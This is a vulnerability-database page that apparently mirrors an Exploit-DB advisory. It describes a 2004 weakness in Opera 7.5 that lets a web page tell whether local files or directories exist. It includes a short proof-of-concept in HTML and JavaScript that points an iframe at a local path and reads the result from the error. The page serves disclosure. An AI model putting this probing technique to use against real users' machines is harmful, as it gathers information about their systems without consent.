Opera Web Browser 7.5 – Resource Detection

Opera Web Browser 7.5 – Resource Detection

漏洞ID 1054527 漏洞类型
发布时间 2004-07-17 更新时间 2004-07-17
图片[1]-Opera Web Browser 7.5 – Resource Detection-安全小百科CVE编号 N/A
图片[2]-Opera Web Browser 7.5 – Resource Detection-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24376
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10961/info

Opera Web Browser is prone to a security weakness that may permit an attacker to determine the existence of resources on a vulnerable computer.

An attacker can use an IFRAME that is accessible within the same domain and change its URI to the location of a file or directory. The attacker can then determine the existence of the resource by the error message returned by Opera.

This weakness can then allow the attacker to carry out other attacks against a vulnerable computer.

Opera 7.53 and prior versions running Windows, Unix, and Apple platforms are reported vulnerable to this issue.

<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
????var sLocal="c:/winnt";
????frames[0].location.href=sLocal;
????setTimeout(
????????function () {
????????????try {
????????????????frames[0].document;
????????????????alert(sLocal+" does not exists.");
????????????} catch (oErr) {
????????????????alert(sLocal+" exists.");
????????????}
????????},
????????250
????);
}
</script>

相关推荐: BisonFTP Server Directory Traversal Vulnerability

BisonFTP Server Directory Traversal Vulnerability 漏洞ID 1103444 漏洞类型 Input Validation Error 发布时间 2001-02-17 更新时间 2001-02-17 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享